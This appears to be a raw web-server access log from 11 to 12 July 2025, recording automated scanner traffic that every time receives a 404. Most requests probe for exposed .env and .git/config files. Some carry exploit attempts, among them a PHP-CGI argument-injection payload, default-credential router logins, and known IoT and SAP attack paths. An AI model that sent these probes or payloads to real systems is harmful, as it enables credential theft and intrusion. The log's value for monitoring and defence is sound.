78.153.140.151 - - [11/Jul/2025:03:39:10 +0300] "GET /src/.env.bak HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:11 +0300] "GET /qa/.env.dist HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:11 +0300] "GET /src/.env.dev HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:11 +0300] "GET /uat/env.json HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:11 +0300] "GET /reactjs/.env HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:12 +0300] "GET /var/www/.env HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:12 +0300] "GET /src/env/.env HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:13 +0300] "GET /tmp/env.save HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:13 +0300] "GET /tmp/.env.uat HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:13 +0300] "GET /tmp/.env.tmp HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:14 +0300] "GET /tmp/.env.pem HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:14 +0300] "GET /tmp/.env.old HTTP/1.1" 404 9 "{}"
78.153.140.151 - - [11/Jul/2025:03:39:14 +0300] "GET /tmp/.env.log HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [11/Jul/2025:03:55:27 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
45.82.78.254 - - [11/Jul/2025:03:55:39 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [11/Jul/2025:04:55:41 +0300] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 9 "{}"
196.251.70.87 - - [11/Jul/2025:05:13:09 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
64.227.150.86 - - [11/Jul/2025:05:44:37 +0300] "GET /aaa9 HTTP/1.1" 404 9 "{}"
64.227.150.86 - - [11/Jul/2025:05:44:44 +0300] "GET /aab8 HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [11/Jul/2025:06:32:08 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [11/Jul/2025:07:45:50 +0300] "GET /admin/assets/js/views/login.js HTTP/1.0" 404 9 "{}"
95.214.52.169 - - [11/Jul/2025:09:56:21 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
139.5.1.112 - - [11/Jul/2025:10:15:17 +0300] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 9 "{}"
20.65.169.214 - - [11/Jul/2025:10:15:28 +0300] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9 "{}"
45.9.168.192 - - [11/Jul/2025:11:41:29 +0300] "POST /index.htm HTTP/1.1" 404 9 "{}"
45.9.168.192 - - [11/Jul/2025:11:41:29 +0300] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 9 "{}"
117.72.82.7 - - [11/Jul/2025:12:45:14 +0300] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 9 "{}"
94.102.49.193 - - [11/Jul/2025:13:37:50 +0300] "GET /sitemap.xml HTTP/1.1" 404 9 "{}"
94.102.49.193 - - [11/Jul/2025:13:37:50 +0300] "GET /.well-known/security.txt HTTP/1.1" 404 9 "{}"
94.102.49.193 - - [11/Jul/2025:13:37:51 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [11/Jul/2025:13:46:05 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
149.50.96.5 - - [11/Jul/2025:13:48:48 +0300] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 9 "{}"
64.62.156.86 - - [11/Jul/2025:14:24:38 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
64.62.156.80 - - [11/Jul/2025:14:25:24 +0300] "GET /geoserver/web/ HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [11/Jul/2025:14:33:01 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
162.243.94.122 - - [11/Jul/2025:14:53:20 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
162.243.94.122 - - [11/Jul/2025:14:53:20 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [11/Jul/2025:16:25:07 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [11/Jul/2025:19:10:28 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
201.7.170.246 - - [11/Jul/2025:19:36:57 +0300] "GET /admin/assets/js/pbxlib.js HTTP/1.0" 404 9 "{}"
167.94.138.58 - - [11/Jul/2025:20:54:28 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
167.94.138.58 - - [11/Jul/2025:20:54:43 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
134.199.214.150 - - [11/Jul/2025:20:56:01 +0300] "GET /form.html HTTP/1.1" 404 9 "{}"
134.199.214.150 - - [11/Jul/2025:20:56:01 +0300] "GET /t4 HTTP/1.1" 404 9 "{}"
134.199.214.150 - - [11/Jul/2025:20:56:02 +0300] "GET /geoip/ HTTP/1.1" 404 9 "{}"
134.199.214.150 - - [11/Jul/2025:20:56:02 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [11/Jul/2025:21:53:42 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
196.251.70.87 - - [11/Jul/2025:23:30:14 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
123.160.223.75 - - [12/Jul/2025:00:04:27 +0300] "GET /favicon.ico?0 HTTP/1.1" 404 9 "{}"
142.93.151.191 - - [12/Jul/2025:00:31:15 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
142.93.151.191 - - [12/Jul/2025:00:31:16 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [12/Jul/2025:00:32:53 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
20.83.173.252 - - [12/Jul/2025:00:38:07 +0300] "GET /actuator/health HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [12/Jul/2025:01:59:41 +0300] "GET /HNAP1/ HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [12/Jul/2025:01:59:41 +0300] "GET /loginMsg.js HTTP/1.1" 404 9 "{}"
192.168.0.250 - - [12/Jul/2025:01:59:42 +0300] "GET /RootDevice.xml HTTP/1.1" 404 9 "{}"
35.246.182.245 - - [12/Jul/2025:02:00:35 +0300] "GET /webpages/index.html HTTP/1.1" 404 9 "{}"
20.15.163.245 - - [12/Jul/2025:02:58:39 +0300] "GET /portal/redlion HTTP/1.1" 404 9 "{}"
139.99.35.32 - - [12/Jul/2025:03:17:46 +0300] "GET /favicon.ico HTTP/1.1" 404 9 "{}"
196.251.70.87 - - [12/Jul/2025:04:09:18 +0300] "GET /.git/config HTTP/1.1" 404 9 "{}"
185.218.84.40 - - [12/Jul/2025:04:19:00 +0300] "GET /admin/login.asp HTTP/1.1" 404 9 "{}"
95.214.52.169 - - [12/Jul/2025:05:08:46 +0300] "PUT /SDK/webLanguage HTTP/1.1" 404 9 "{}"
119.179.206.110 - - [12/Jul/2025:05:20:34 +0300] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 9 "{}"
149.50.96.5 - - [12/Jul/2025:05:52:39 +0300] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 9 "{}"
87.255.194.135 - - [12/Jul/2025:06:32:40 +0300] "GET /admin/assets/css/jquery-ui.css HTTP/1.0" 404 9 "{}"
149.50.96.5 - - [12/Jul/2025:06:45:07 +0300] "GET /page/style/index.css HTTP/1.1" 404 9 "{}"
78.153.140.177 - - [12/Jul/2025:07:11:42 +0300] "GET /.env HTTP/1.1" 404 9 "{}"
